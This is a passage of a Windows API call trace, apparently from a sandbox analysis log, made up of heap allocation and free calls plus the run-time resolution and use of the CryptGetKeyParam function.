(HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0110.659] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0110.659] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0110.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0110.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0110.659] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0110.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0110.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0110.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e90 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0110.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0110.660] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0110.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0110.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.660] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0110.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0110.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0110.661] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0110.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0110.662] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0110.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0110.662] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0110.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0110.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0110.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0110.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0110.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0110.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0110.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0110.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0110.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0110.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0110.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0110.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0110.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0110.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0110.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0110.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0110.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0110.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0110.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0110.666] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0110.666] CryptGetKeyParam (in: hKey=0x41ac100, dwParam=0x7, pbData=0x43e25e0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e25e0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0110.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 